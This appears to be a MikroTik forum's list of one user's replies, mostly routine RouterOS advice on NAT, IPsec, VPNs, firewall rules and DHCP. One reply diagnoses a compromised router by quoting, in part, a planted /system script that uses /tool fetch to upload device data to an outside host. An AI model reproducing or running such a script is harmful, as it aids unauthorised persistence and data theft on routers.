Community discussions

Search found 304 matches

  • 1
  • 2
by evince
Thu Sep 26, 2019 10:46 am
Forum: The Dude
Topic: The Dude Client for Android?
Replies: 2
Views: 528

Re: The Dude Client for Android?

+1 it woul'd be very interesting.
by evince
Wed Sep 25, 2019 12:47 pm
Forum: Beginner Basics
Topic: DHCP OPTION 160
Replies: 0
Views: 176

DHCP OPTION 160

Dear all,

Can you tell me if option 160 is working on Mikrotik? I'm not able to make it working.

Thank you in advance,
by evince
Wed Sep 25, 2019 12:02 pm
Forum: The Dude
Topic: Monitor PPPoE dynamic
Replies: 0
Views: 254

Monitor PPPoE dynamic

Dear all,

I'd like to monitor a second WAN with PPPoE dynamic IP. Is there any way?

Thank you in advance,
by evince
Fri Sep 20, 2019 5:08 pm
Forum: General
Topic: New IP cloud is coming.
Replies: 84
Views: 27035

Re: New IP cloud is coming.

You think there is any chance in the future to support multi-wan setups? One option is to prepend or append the interface number to the dyndns hostname? pppoe-out1 = xxxxx-1.sn.mynetname.net pppoe-out2 = xxxxx-2.sn.mynetname.net This! We need to be able to monitor backup connections that have dynam...
by evince
Mon Jul 15, 2019 1:28 pm
Forum: Beginner Basics
Topic: Block Youtube but not with gmail
Replies: 11
Views: 952

Re: Block Youtube but not with gmail

TLS is working, i do use it @ work. Where did you place your rule? do you have matching?
by evince
Thu Jul 11, 2019 12:53 pm
Forum: Beginner Basics
Topic: Block Youtube but not with gmail
Replies: 11
Views: 952

Re: Block Youtube but not with gmail

No, do not use L7, but TLS Host.

/ip firewall filter
add action=reject chain=forward comment="block youtube" protocol=tcp reject-with=icmp-network-unreachable tls-host=*youtube*
by evince
Thu Jun 13, 2019 3:23 pm
Forum: Wireless Networking
Topic: Change network
Replies: 2
Views: 295

Re: Change network

Hello, you need to brigde all the ports in order to make it work.(or at lease the uplink)
by evince
Thu Jun 06, 2019 2:28 pm
Forum: General
Topic: Public-Mikrotik-Bandwidth-Test-Server(s)
Replies: 574
Views: 419048

Re: Public-Mikrotik-Bandwidth-Test-Server(s)

Same problem today, unable to connect :(
by evince
Wed May 22, 2019 11:24 am
Forum: General
Topic: Download problem!!
Replies: 17
Views: 1025

Re: Download problem!!

Hello,

It seems to be a TCP/MSS problem, take a look at this :

https://wiki.mikrotik.com/wiki/Manual:I ... all/Mangle
by evince
Mon Apr 29, 2019 6:12 pm
Forum: General
Topic: VPN can't access SMB shares
Replies: 10
Views: 749

Re: VPN can't access SMB shares

Hello, it can be a TCP/MSS issue
by evince
Mon Apr 29, 2019 5:43 pm
Forum: Beginner Basics
Topic: PPTP VPN problem "could not determine local IP address"
Replies: 1
Views: 312

Re: PPTP VPN problem "could not determine local IP address"

Hello, check your profile if you have local address assigned.
by evince
Thu Dec 06, 2018 12:37 pm
Forum: General
Topic: Renew IP address of PPPoE client
Replies: 10
Views: 1203

Re: Renew IP address of PPPoE client

Hello,

try to first remove his entry in the DHCP Lease, and then reconnect it.
by evince
Fri Nov 23, 2018 11:53 am
Forum: Beginner Basics
Topic: Frustration ! - Need help tp configure RB3011UiAS-RM so as to act as router with two ISP
Replies: 2
Views: 363

Re: Frustration ! - Need help tp configure RB3011UiAS-RM so as to act as router with two ISP

Hello, For your second line (adsl) you need to plug it on an isolated port (this port can not be a prt of your bridge) Then just add route regarding the setup you need. If your ETH2 is a part of your bridge, you need to assign an ip and the dhcp server to this. All your configuration will pint to th...
by evince
Mon Nov 12, 2018 12:25 pm
Forum: General
Topic: [SOLVED] Unable to dstnat from port 80
Replies: 15
Views: 2024

Re: Unable to dstnat from port 80

Hello,

Be sure you do not have any firewall rule that drops forward trafic
by evince
Wed Nov 07, 2018 1:12 pm
Forum: General
Topic: Error when setup PPPOE: terminating... - failed to authenticate ourselves to peer
Replies: 2
Views: 2158

Re: Error when setup PPPOE: terminating... - failed to authenticate ourselves to peer

I don't know why, but it happens if you're using another profile, but not default-encryption . Set your PPP connection to use default-encryption and it will connect. I tried to create other profiles with the same settings as default-encryption, but they actually doesn't work as default-encryption. ...
by evince
Tue Oct 16, 2018 11:59 am
Forum: Beginner Basics
Topic: PPTP Firewall
Replies: 2
Views: 345

Re: PPTP Firewall

Hello, you need to enable PPT Server. Go to PPP then PPTP Server or via the terminal past this line : /interface pptp-server server set enabled=yes
by evince
Wed Oct 10, 2018 12:12 pm
Forum: Beginner Basics
Topic: Netflix not working (unblocker or proxy)
Replies: 5
Views: 2387

Re: Netflix not working (unblocker or proxy)

Hello,

the best way is to use Netinstall and reconfigure your router.Be sure don't use same password as before hacking.
by evince
Fri Oct 05, 2018 12:51 pm
Forum: General
Topic: firewall rules
Replies: 2
Views: 440

Re: firewall rules

Hello,

You should use TLS Host feature instead of Layer 7 protocol.

Take a look at this : viewtopic.php?t=129672
by evince
Fri Sep 21, 2018 11:25 am
Forum: General
Topic: don't connect winbox from wan after 6.43
Replies: 1
Views: 269

Re: don't connect winbox from wan after 6.43

Hello, update your router to 6.43.2 and update your winbox
by evince
Sun Sep 09, 2018 9:16 pm
Forum: Beginner Basics
Topic: IPsec/GRE between sites w/ MT (again...)
Replies: 2
Views: 373

Re: IPsec/GRE between sites w/ MT (again...)

Hello,

You can use L2TP/IPSec for your tunnels. Then your LTE will work as client and will not care of dynamic IP.
by evince
Mon Sep 03, 2018 12:48 pm
Forum: Beginner Basics
Topic: L2tp error 789
Replies: 5
Views: 1542

Re: L2tp error 789

Hell, maybe phase2 proposals not correct.
by evince
Wed Aug 22, 2018 5:01 pm
Forum: General
Topic: wrong username or password after restore
Replies: 2
Views: 341

Re: wrong username or password after restore

Hello, let the password blank and try again, it will work
by evince
Tue Jul 03, 2018 1:03 pm
Forum: Beginner Basics
Topic: SSH Port Forwarding
Replies: 15
Views: 3083

Re: SSH Port Forwarding

OK 3 ;;; enable ssh from outside chain=input action=accept protocol=tcp dst-port=22 log=no log-prefix="" should be 3 ;;; enable ssh from outside chain=forward action=accept protocol=tcp dst-port=22 log=no log-prefix="" Because input chain is for the router itself, and forward is for peripherals afte...
by evince
Tue Jul 03, 2018 12:23 pm
Forum: Beginner Basics
Topic: SSH Port Forwarding
Replies: 15
Views: 3083

Re: SSH Port Forwarding

Do you have any forward rule in your firewall filter?

Even if the counter increases, you need to specify dst-address or in-interface.
by evince
Tue Jul 03, 2018 12:08 pm
Forum: Beginner Basics
Topic: SSH Port Forwarding
Replies: 15
Views: 3083

Re: SSH Port Forwarding

Hello,

/ip firewall nat
add action=dst-nat chain=dstnat dst-port=5022 protocol=tcp to-addresses=192.168.100.22 to-ports=22

You need to specify in-interface (your WAN) or dst-address.(Your public IP)

Regards,
by evince
Mon Jul 02, 2018 10:20 am
Forum: Beginner Basics
Topic: Dst NAT not working through AP bridge ? [SOLVED]
Replies: 3
Views: 560

Re: Dst NAT not working through AP bridge ? [SOLVED]

Hello,

1 chain=dstnat action=dst-nat to-addresses=192.168.10.15 to-ports=80 protocol=tcp dst-address=Public-IP-Address
in-interface=pppoe-out1 dst-port=80 log=no log-prefix=""

Either you choose dst-address or in-interface but not both.
by evince
Tue Jun 26, 2018 5:49 pm
Forum: General
Topic: Some HTTPS web sites won't work!
Replies: 8
Views: 1044

Re: Some HTTPS web sites won't work!

In your configuration we can see : add action=change-mss chain=forward new-mss=1500 protocol=tcp tcp-flags=syn \ tcp-mss=1361-65535 It shouldn't work. And why did you set MTU 1520 to your bridges? Then, your router is still compromised : /ppp aaa set interim-update=1m use-circuit-id-in-nas-port-id=y...
by evince
Tue Jun 26, 2018 2:23 pm
Forum: Wireless Networking
Topic: Capsman - Not getting IP on slave-interface [SOLVED]
Replies: 2
Views: 552

Re: Capsman - Not getting IP on slave-interface [SOLVED]

Hello, There is some errors in your configuration : /caps-man datapath add bridge=bridge local-forwarding=yes name=datapathVlan20 vlan-id=20 vlan-mode=use-tag add bridge=bridge local-forwarding=yes name=datapathVlan30 vlan-id=30 vlan-mode=use-tag You use default bridge for both datapath, either you ...
by evince
Tue Jun 26, 2018 2:09 pm
Forum: General
Topic: Kid Control feature
Replies: 5
Views: 1228

Re: Kid Control feature

ello,

You can add many schedule per day, just use arrows next to the corresponding day.

Regards,
by evince
Tue Jun 26, 2018 12:59 pm
Forum: General
Topic: Some HTTPS web sites won't work!
Replies: 8
Views: 1044

Re: Some HTTPS web sites won't work!

Hello, your router seems to have been attacked, check this : /system script add name=ip owner=admin policy=\ reboot,read,write,policy,test,password,sniff,sensitive source="{/tool fetch \ url=(\"http://www.boss-ip.com/Core/Update.ashx ... 98fa&actio\ n=upload&sncode=F8C49100B20F15CD3F906164FD50CB7A&d...
by evince
Wed Jun 13, 2018 11:49 am
Forum: General
Topic: Cannot access some sites [SOLVED]
Replies: 6
Views: 680

Re: Cannot access some sites [SOLVED]

Hello, check if you don't have a TCP/MSS problem.
by evince
Mon Jun 11, 2018 1:28 pm
Forum: Beginner Basics
Topic: Bridging SFP and Eth1
Replies: 2
Views: 564

Re: Bridging SFP and Eth1

Of course,

Create a bridge and add thoses interfaces to the bridge
by evince
Mon Jun 11, 2018 12:14 am
Forum: Beginner Basics
Topic: Trying to block sites. Mild success.
Replies: 8
Views: 1136

Re: Trying to block sites. Mild success.

Hello, don' use layer 7, use this instead :

/ip firewall filter
add chain=forward dst-port=443 protocol=tcp tls-host=*.facebook.com action=reject
add chain=forward dst-port=80 protocol=tcp tls-host=*.speedtest.net action=reject
by evince
Sun Jun 10, 2018 10:00 am
Forum: Beginner Basics
Topic: RB750Gr3 as basic switch
Replies: 12
Views: 1519

Re: RB750Gr3 as basic switch

Yes you can use these DNS :)
by evince
Fri Jun 08, 2018 2:06 pm
Forum: Beginner Basics
Topic: RB750Gr3 as basic switch
Replies: 12
Views: 1519

Re: RB750Gr3 as basic switch

You're correct, but then you'll also need to set DNS.
Of course :)
by evince
Fri Jun 08, 2018 1:52 pm
Forum: Beginner Basics
Topic: RB750Gr3 as basic switch
Replies: 12
Views: 1519

Re: RB750Gr3 as basic switch

The default route is needed if you want Internet directly on your router (for updates,...)
by evince
Fri Jun 08, 2018 12:01 pm
Forum: Beginner Basics
Topic: RB750Gr3 as basic switch
Replies: 12
Views: 1519

Re: RB750Gr3 as basic switch

Hello, just go to /ip Address and add the corresponding address to your bridge.

And /ip route for your default route.

Do you use Winbox or Webfig?
by evince
Thu Jun 07, 2018 3:50 pm
Forum: General
Topic: L2TP IPSec (no suit proposal found)
Replies: 58
Views: 14468

Re: L2TP IPSec (no suit proposal found)

Hello,

Can you export your settings regardins l2tp configuration please?
by evince
Thu Jun 07, 2018 3:47 pm
Forum: Beginner Basics
Topic: Problem with reaching 2 different networks - ipsec
Replies: 1
Views: 270

Re: Problem with reaching 2 different networks - ipsec

Hello, yes you need a rule like this : /ip firewall nat add action=accept chain=srcnat dst-address=192.168.88.0/24 src-address=192.168.0.0/24 (Router 192.168.0.1) and in the second router : /ip firewall nat add action=accept chain=srcnat dst-address=192.168.0.0/24 src-address=192.168.88.0/24 (Router...
by evince
Thu Jun 07, 2018 9:59 am
Forum: Beginner Basics
Topic: RB750Gr3 as basic switch
Replies: 12
Views: 1519

Re: RB750Gr3 as basic switch

Hello,

Just add all the ports to the bridge, assign an IP Address to this brdge and add a default route.
by evince
Fri May 25, 2018 12:51 pm
Forum: Beginner Basics
Topic: Fortigate SSL-VPN connection
Replies: 10
Views: 8691

Re: Fortigate SSL-VPN connection

VPN IPSec between Fortigate and Mikrotik is quite easy. The only need is to match both phase1 and phase2. In fortigate side, you can choose interface mode instead of policy based vpn if you prefer
by evince
Fri May 25, 2018 12:43 pm
Forum: Beginner Basics
Topic: Blocking some ports to access Youtube
Replies: 4
Views: 768

Re: Blocking some ports to access Youtube

Hello, you can try this :

/ip firewall filter
add action=reject chain=forward protocol=tcp reject-with=icmp-network-unreachable src-address=192.168.0.5-192.168.0.254 tls-host=*.youtube.com

Adapt the src-address as you need.
by evince
Thu Mar 29, 2018 11:39 am
Forum: General
Topic: Exclude ip from ip address scope
Replies: 4
Views: 508

Re: Exclude ip from ip address scope

Hello,

Create a first mangle rule in accept mode for the excluded IP.
by evince
Fri Mar 16, 2018 10:37 am
Forum: General
Topic: One way audio on VoIP over IKEv2/IPsec connection [SOLVED]
Replies: 3
Views: 597

Re: One way audio on VoIP over IKEv2/IPsec connection [SOLVED]

Hello, you need to add your src-address in ipsec policy :

/ip ipsec policy
set 0 dst-address=192.168.2.0/24 src-address=0.0.0.0/0

The, create a nat rule in src nat and accept, src-address=your_lan and dst_address=remote_lan.

Place the policy in the top.

Regards,
by evince
Tue Jan 30, 2018 10:24 am
Forum: General
Topic: HotSpot User name basis login
Replies: 1
Views: 246

Re: HotSpot User name basis login

Hello,

/ip hotspot user profile
set [ find default=yes ] shared-users=1
by evince
Tue Jan 30, 2018 9:47 am
Forum: Announcements
Topic: v6.42rc [release candidate] is released!
Replies: 538
Views: 97343

Re: v6.42rc [release candidate] is released!

irghost, raffav, Cha0s - Seems that we have found an issue with new TLS matcher. We will try to fix it as soon as possible;
v6.42rc14, and still not working
Ok it is working, it was a problem of configuration.
by evince
Fri Jan 26, 2018 2:32 pm
Forum: Announcements
Topic: v6.42rc [release candidate] is released!
Replies: 538
Views: 97343

Re: v6.42rc [release candidate] is released!

Version 6.42rc15 has been released. Changes since previous release: *) routerboard - added RouterBOOT "auto-upgrade" after RouterOS upgrade (extra reboot required); If you experience version related issues, then please send supout file from your router to support@mikrotik.com. File must be generate...
by evince
Fri Jan 26, 2018 2:20 pm
Forum: General
Topic: VPN IPSec between two Mikrotik
Replies: 19
Views: 1364

Re: VPN IPSec between two Mikrotik

Hello,

Did you put your nat rule in the top?
by evince
Thu Jan 25, 2018 4:25 pm
Forum: General
Topic: L2TP+IPSec Client behind NAT
Replies: 14
Views: 8750

Re: L2TP+IPSec Client behind NAT

L2TP/IPsec is limited to only one peer behind NAT. It is suggested to use IKEv2 for such occasions. I still don't exactly understand why? The IPsec peer dynamically generated by l2tp-server configuration with use-ipsec=required has nat traversal support set to "yes", and the L2TP is tunnelled over ...
by evince
Thu Jan 25, 2018 11:21 am
Forum: Announcements
Topic: v6.42rc [release candidate] is released!
Replies: 538
Views: 97343

Re: v6.42rc [release candidate] is released!

evince - Have you opened support ticket regarding this issue? We have not received any more complaints that this option would not work and have not experienced any more issues with it in our lab.
Hello Strods, i'll open a ticket right now, thank you.
by evince
Wed Jan 24, 2018 6:24 pm
Forum: Announcements
Topic: v6.42rc [release candidate] is released!
Replies: 538
Views: 97343

Re: v6.42rc [release candidate] is released!

irghost, raffav, Cha0s - Seems that we have found an issue with new TLS matcher. We will try to fix it as soon as possible;
v6.42rc14, and still not working
by evince
Mon Jan 22, 2018 2:21 pm
Forum: Beginner Basics
Topic: How to disable Ping in Mikrotix hex rb750gr3?
Replies: 4
Views: 542

Re: How to disable Ping in Mikrotix hex rb750gr3?

Just disable firewall rule regarding ICMP protocol.

It is a good idea to disable PING (or filtering with address-list)
by evince
Thu Jan 18, 2018 5:43 pm
Forum: Beginner Basics
Topic: Route WAN traffic over IPSec tunnel possible?
Replies: 10
Views: 3421

Re: Route WAN traffic over IPSec tunnel possible?

Of course, because this network is maybe not authorized to masquerade.I've this setup, but with gre over ipsec
by evince
Thu Jan 18, 2018 5:28 pm
Forum: Beginner Basics
Topic: Route WAN traffic over IPSec tunnel possible?
Replies: 10
Views: 3421

Re: Route WAN traffic over IPSec tunnel possible?

Hello,
did u masquerade 10.0.0.0/16 in the second router?
by evince
Wed Jan 17, 2018 10:25 am
Forum: General
Topic: How to disable access from local to some local to Mikrotik AP?
Replies: 13
Views: 933

Re: How to disable access from local to some local to Mikrotik AP?

Why don't u use Vlan?

It is realy more secure.
by evince
Wed Jan 17, 2018 10:21 am
Forum: General
Topic: Streaming Issues
Replies: 7
Views: 1199

Re: Streaming Issues

Hello, I'm running kodi with RoS without any issue.

Can you explain your problem?
by evince
Mon Jan 15, 2018 9:58 am
Forum: Beginner Basics
Topic: Help! Beginner
Replies: 11
Views: 1367

Re: Help! Beginner

I'll add something. Do not forget the changes for the 6.412 version.

Take a look to your bridge, and be sure that ports 2,3,4 and 5 are on the bridge.
by evince
Thu Jan 11, 2018 4:30 pm
Forum: General
Topic: Help Creation VPN IPSEC [Solved]
Replies: 6
Views: 528

Re: Help Creation VPN IPSEC

Hello, did you create the NAT rule, and is it in the top of the list?
by evince
Wed Jan 10, 2018 12:00 pm
Forum: General
Topic: VPN ipsec between AVM FritzBox an Mikrotik
Replies: 15
Views: 9236

Re: VPN ipsec between AVM FritzBox an Mikrotik

Hello, can you tell me if the connection is established or not?

I can tell you it is working, i just build a vpn and all is working
by evince
Tue Jan 09, 2018 11:31 am
Forum: General
Topic: Issue with Getting DHCP IP using Bridge interface.
Replies: 5
Views: 3472

Re: Issue with Getting DHCP IP using Bridge interface.

Hello, can you post your configuration?
by evince
Mon Jan 08, 2018 1:07 pm
Forum: Beginner Basics
Topic: port forwarding blocks internet
Replies: 5
Views: 641

Re: port forwarding blocks internet

Hello, post your config it'll be more easy to help you
by evince
Tue Dec 19, 2017 4:26 pm
Forum: Beginner Basics
Topic: Need help with my firewall rules [SOLVED]
Replies: 3
Views: 537

Re: Need help with my firewall rules [SOLVED]

Hello, there is a mistake :

add action=drop chain=input in-interface=!ether1 protocol=icmp icmp-options=8:0-255

should be

add action=drop chain=input in-interface=ether1 protocol=icmp icmp-options=8:0-255
by evince
Mon Dec 18, 2017 6:00 pm
Forum: General
Topic: winbox remote access not working
Replies: 2
Views: 456

Re: winbox remote access not working

As i can see your rules for winbox are disabled.
by evince
Mon Dec 18, 2017 10:07 am
Forum: Beginner Basics
Topic: CCR1009-7G-1C-1S+PC basic setup
Replies: 7
Views: 2425

Re: CCR1009-7G-1C-1S+PC basic setup

Hello, your config is not complete, there is no nat, firewall and route rule
by evince
Thu Dec 14, 2017 4:58 pm
Forum: Wireless Networking
Topic: How to configure cAPlite in dhcp relay mode?
Replies: 5
Views: 546

Re: How to configure cAPlite in dhcp relay mode?

Not at all, it just means that your cap will be in the same bridge than your main network :)

You can keep your capsmanager
by evince
Thu Dec 14, 2017 1:08 pm
Forum: Wireless Networking
Topic: How to configure cAPlite in dhcp relay mode?
Replies: 5
Views: 546

Re: How to configure cAPlite in dhcp relay mode?

It should be done directly on your device, not via caps manager. Just bridge ether1 and wlan in your CAPlite
by evince
Thu Dec 14, 2017 10:45 am
Forum: Wireless Networking
Topic: How to configure cAPlite in dhcp relay mode?
Replies: 5
Views: 546

Re: How to configure cAPlite in dhcp relay mode?

Hello, you do not need a dhcp relay, but your devices have to be configured in bridge mode, so they will get an ip from your main router.
by evince
Thu Dec 14, 2017 10:14 am
Forum: Beginner Basics
Topic: L2TP server doesn't seems to be working
Replies: 5
Views: 911

Re: L2TP server doesn't seems to be working

Hello, can you post your config please?

Or mayben, you just need to activate proxy-arp on your local bridge or lan interface, depending your configuration.
by evince
Wed Dec 13, 2017 11:10 am
Forum: Beginner Basics
Topic: CCR1009-7G-1C-1S+PC basic setup
Replies: 7
Views: 2425

Re: CCR1009-7G-1C-1S+PC basic setup

Hello, You have a problem with your configuration, /ip address add address=192.168.88.1/24 comment=defconf disabled=yes interface=combo1 network=192.168.88.0 add address=192.168.2.187/24 comment="xxxx" interface=ether3 network=192.168.2.0 add address=192.168.1.3/24 interface=ether1 network=192.168.1...
by evince
Tue Dec 12, 2017 12:21 pm
Forum: Beginner Basics
Topic: CCR1009-7G-1C-1S+PC basic setup
Replies: 7
Views: 2425

Re: CCR1009-7G-1C-1S+PC basic setup

Hello, post your config please : export compact hide-sensitive
by evince
Tue Dec 05, 2017 4:40 pm
Forum: General
Topic: Nice guest wifi implementation
Replies: 7
Views: 620

Re: Nice guest wifi implementation

Hello, i have a guest network and here is what is done :

Firewall rule to allow only 80,443,25,587 TCP and 53 UDP

Setting a queue rule : upload 2Mb and download 5Mb

Regards,
by evince
Tue Dec 05, 2017 12:18 pm
Forum: General
Topic: wake on lan
Replies: 1
Views: 243

Re: wake on lan

Hello,

Mikrotik can send magic packets but can not receive them.

Regards,
by evince
Wed Nov 15, 2017 12:30 pm
Forum: General
Topic: Some Sites are not loading
Replies: 1
Views: 246

Re: Some Sites are not loading

Hello,

It a hairpin nat problem : https://wiki.mikrotik.com/wiki/Hairpin_NAT

Regards,
by evince
Tue Nov 07, 2017 2:57 pm
Forum: General
Topic: Limiting VPN cliens access to specific or single LAN devices
Replies: 1
Views: 256

Re: Limiting VPN cliens access to specific or single LAN devices

Hello,

Use another subnet for your VPN users and add some firewall rules. First, allowing VPUser to "Some hosts" and then add a drop rule for the whole LAN. Each in forward chain.

Regards,
by evince
Tue Nov 07, 2017 10:30 am
Forum: General
Topic: can't doing ping from pc to pc in vpn
Replies: 2
Views: 337

Re: can't doing ping from pc to pc in vpn

Hello,

Take a look at this great and easy tutorial, you should find the problem : http://gregsowell.com/?p=787

Regards,
by evince
Mon Oct 30, 2017 11:58 am
Forum: Beginner Basics
Topic: Port forwarding
Replies: 5
Views: 727

Re: Port forwarding

Hello, check if HTTP server is not running on your board : /ip service
by evince
Wed Oct 25, 2017 3:55 pm
Forum: General
Topic: Internet not working! Ping OK
Replies: 6
Views: 1133

Re: Internet not working! Ping OK

Post your MANGLE rules, as you avec routing mark too.
by evince
Mon Oct 23, 2017 6:10 pm
Forum: Beginner Basics
Topic: Where can I get hotspot files ? [SOLVED]
Replies: 3
Views: 672

Re: Where can I get hotspot files ? [SOLVED]

Hell, you need to activate the feature in order to see the files.

Regards,
by evince
Tue Oct 17, 2017 1:09 pm
Forum: Beginner Basics
Topic: I can't ping router from LAN interface, but can from mgmt interface.
Replies: 2
Views: 679

Re: I can't ping router from LAN interface, but can from mgmt interface.

Hello, there is a problem in your config : /ip address add address=192.168.0.1/24 interface=if_lan network=192.168.0.0 add address=192.168.0.1/24 interface=if_wlan network=192.168.0.0 add address=192.168.0.1/24 interface=if_voip network=192.168.0.0 add address=192.168.88.1/24 interface=if_mgmt netwo...
by evince
Tue Oct 10, 2017 3:43 pm
Forum: General
Topic: DHCP over GRE Tunnel
Replies: 6
Views: 1464

Re: DHCP over GRE Tunnel

If someone needs an update, i could get it working :)

I'd set WAN IP's in DHCP Relay parametres and use interface WAN in the DHCP server Interface.
by evince
Tue Oct 10, 2017 1:35 pm
Forum: Beginner Basics
Topic: Problem with redirect to www from LAN
Replies: 10
Views: 963

Re: Problem with redirect to www from LAN

Hello,

Disable the first rule : add chain=dstnat dst-address=78.11.111.114 protocol=tcp dst-port=80 action=dst-nat to-address=10.1.1.1

Ant try from WAN and LAN.
by evince
Mon Oct 09, 2017 1:41 pm
Forum: Beginner Basics
Topic: Problem with redirect to www from LAN
Replies: 10
Views: 963

Re: Problem with redirect to www from LAN

Hello,

Your hairpin nat rule should look like this :

add action=dst-nat chain=dstnat comment="hairpin nat" dst-address=!10.1.0.0/16 dst-address-type=local log=yes log-prefix=hairpin to-addresses=10.1.1.1

Regards,
by evince
Fri Oct 06, 2017 10:14 am
Forum: The Dude
Topic: windows dude client 6.40.4 VIRUS
Replies: 5
Views: 1457

Re: windows dude client 6.40.4 VIRUS

Same problem here, ticket open to the support
by evince
Wed Oct 04, 2017 4:11 pm
Forum: The Dude
Topic: Feature request RouterBOARD upgrade mechanism
Replies: 3
Views: 961

Re: Feature request RouterBOARD upgrade mechanism

Use the Group tab!
Ok Normis but after that? How to upgrade Routerboard?
by evince
Wed Sep 20, 2017 5:32 pm
Forum: Beginner Basics
Topic: Multple DHCP for VLANs
Replies: 2
Views: 530

Re: Multple DHCP for VLANs

Hello, You have a mistake in your addresses : [admin@MikroTik] > ip address print Flags: X - disabled, I - invalid, D - dynamic # ADDRESS NETWORK INTERFACE 0 172.16.0.1/23 172.16.0.0 ether1 1 172.16.1.1/24 172.16.1.0 vlan1 2 172.16.100.1/24 172.16.100.0 vlan100 vlan1 subnet is a part of your ether1 ...
by evince
Sat Sep 09, 2017 3:57 pm
Forum: Beginner Basics
Topic: Not able to access internet on any port besides 2
Replies: 1
Views: 345

Re: Not able to access internet on any port besides 2

Hello, check if your interfaces are in the same bridge than ether2.
by evince
Tue Sep 05, 2017 4:10 pm
Forum: General
Topic: why i cant see switches via l2tp?
Replies: 6
Views: 901

Re: why i cant see switches via l2tp?

You have to activate on on the router where you establish your L2TP connection under bridge(or LAN_INTERFACE) ==> ARP and then choose proxy-arp in the drop-list
by evince
Tue Sep 05, 2017 1:41 pm
Forum: General
Topic: why i cant see switches via l2tp?
Replies: 6
Views: 901

Re: why i cant see switches via l2tp?

Did you enable proxy-arp on your LAN interface (or bridge) ?
by evince
Tue Sep 05, 2017 1:15 pm
Forum: Beginner Basics
Topic: Dynamic ip site to site ipsec help
Replies: 7
Views: 5623

Re: Dynamic ip site to site ipsec help

Hello, try a script like this : /system script add name=update_dyns_ipsec owner=admin policy=\ ftp,reboot,read,write,policy,test,sniff,sensitive source="/system script\r\ \n:global LocalSite [:yourdomain.com]\r\ \n:global RemoteSite [:resolve remotedomain.com]\r\ \n/ip ipsec policy set 1 sa-dst-addr...
by evince
Tue Sep 05, 2017 12:58 pm
Forum: Beginner Basics
Topic: Log PPTP
Replies: 1
Views: 1076

Re: Log PPTP

Hello,

As your 1723 TCP port is open from outside, it is "normal" to see this kind of line. Hackers always try to connect to open ports.

Regards,
by evince
Fri Sep 01, 2017 6:06 pm
Forum: General
Topic: Help for VPN IPSEC
Replies: 2
Views: 571

Re: Help for VPN IPSEC

Hello,

Take a look to this great and easy tutorial : http://gregsowell.com/?p=787

Regards,
by evince
Wed Aug 02, 2017 3:05 pm
Forum: General
Topic: Problem with EoIP Tunnel - Websites not working
Replies: 2
Views: 786

Re: Problem with EoIP Tunnel - Websites not working

Or a TCP/MSS issue.
by evince
Mon Apr 24, 2017 11:22 am
Forum: Beginner Basics
Topic: proxy?
Replies: 1
Views: 271

Re: proxy?

Hello, post your config, you should have something wrong on it.

Regards,
by evince
Fri Apr 21, 2017 4:37 pm
Forum: Beginner Basics
Topic: 2 network, 2 ISP, Failover need help
Replies: 11
Views: 1610

Re: 2 network, 2 ISP, Failover need help

Hello,

For me the best way would be :

- Configure both Internet connection in 1 router. And just add 2 static routes with differents costs.
by evince
Fri Apr 21, 2017 4:32 pm
Forum: General
Topic: MikroTik as Transparent Web Proxy Server for Multiple Web Servers
Replies: 9
Views: 2003

Re: MikroTik as Transparent Web Proxy Server for Multiple Web Servers

Now, you need to add some A Records to your DNS zone, like :

- Subdomain1.domain.com IP: xxx.xxx.xxx.xxx
- Subdomain2.domain.com IP : xxx.xxx.xxx.xxx
by evince
Fri Apr 21, 2017 4:29 pm
Forum: General
Topic: Phishing
Replies: 6
Views: 817

Re: Phishing

It is owned by MikroTik. Nothing bad there. It is the same server, just an alternate domain
Ok thank you Normis :)
by evince
Fri Apr 21, 2017 1:26 pm
Forum: General
Topic: Phishing
Replies: 6
Views: 817

Phishing

Hello, i was ooking for something on Google, and here is what i have found : https://wiki.microtik.com

Be careful with this site.
by evince
Fri Apr 21, 2017 1:25 pm
Forum: General
Topic: MikroTik as Transparent Web Proxy Server for Multiple Web Servers
Replies: 9
Views: 2003

Re: MikroTik as Transparent Web Proxy Server for Multiple Web Servers

Hello, read again and it will work, i have the same setup and all is working great.
How do I actually create a different address for each server?
Subdomain1.domain.com
Subdomain2.domain.com
Just add static DNS entries on your Mikrotik.
by evince
Wed Apr 12, 2017 11:24 am
Forum: Beginner Basics
Topic: Hotspot without RouterBoard
Replies: 3
Views: 433

Re: Hotspot without RouterBoard

Hello, yes you can runs ROs in vmware, download your image here : https://mikrotik.com/download

Follow this tutorial : https://vworld.nl/?p=2651 by exemple

Regards,
by evince
Tue Apr 11, 2017 4:33 pm
Forum: General
Topic: EOIP Tunnel
Replies: 3
Views: 639

Re: EOIP Tunnel

Hello, you should post your config if you need help.
by evince
Fri Apr 07, 2017 6:26 pm
Forum: General
Topic: no internet after forwarding ports
Replies: 9
Views: 963

Re: no internet after forwarding ports

Hello,
Just the dst-address. Out interface is not for inbound traffic, just outbound with masquerade action.

Sent from Tapatalk
You are right, sorry it is a mistake :) I'd say in-interface instead of out-interface :)
by evince
Fri Apr 07, 2017 5:52 pm
Forum: General
Topic: no internet after forwarding ports
Replies: 9
Views: 963

Re: no internet after forwarding ports

Hello,
Just the dst-address. Out interface is not for inbound traffic, just outbound with masquerade action.

Sent from Tapatalk
It depends if he runs with multiple public IP
by evince
Fri Apr 07, 2017 12:35 pm
Forum: Beginner Basics
Topic: DNS for PPTP clients
Replies: 9
Views: 4864

Re: DNS for PPTP clients

Yes, in the properties of the vpn connection (client side) just add the DNS suffix

==> Properties ==> Network management ==> TCP IPv4 ==> properties ==> advanced ==> DNS
by evince
Fri Apr 07, 2017 10:59 am
Forum: General
Topic: Unable to Ping Internet From WAN2.
Replies: 2
Views: 341

Re: Unable to Ping Internet From WAN2.

Hello, the problem should be from your routing table. You need mangle rule + correct route for your setup.
by evince
Fri Apr 07, 2017 10:56 am
Forum: General
Topic: Really Strange VPN Problem
Replies: 7
Views: 2425

Re: Really Strange VPN Problem

Hello, it looks like a MTU or TCP-MSS problem, try to change those values and try again
by evince
Fri Apr 07, 2017 10:46 am
Forum: General
Topic: no internet after forwarding ports
Replies: 9
Views: 963

Re: no internet after forwarding ports

Hello, in your NAT rules, you need to specify the out-interface(WAN) or dst-address (your public IP)

Regards,
by evince
Fri Apr 07, 2017 10:44 am
Forum: Beginner Basics
Topic: PPPoE Server Issue
Replies: 1
Views: 296

Re: PPPoE Server Issue

Hello,

It seems like if you have a 100M switch or something else between your CCR and your customers
by evince
Fri Apr 07, 2017 10:40 am
Forum: Beginner Basics
Topic: DNS for PPTP clients
Replies: 9
Views: 4864

Re: DNS for PPTP clients

Hello, in your pptp client, just add a DNS suffix, it will solve your problem.
by evince
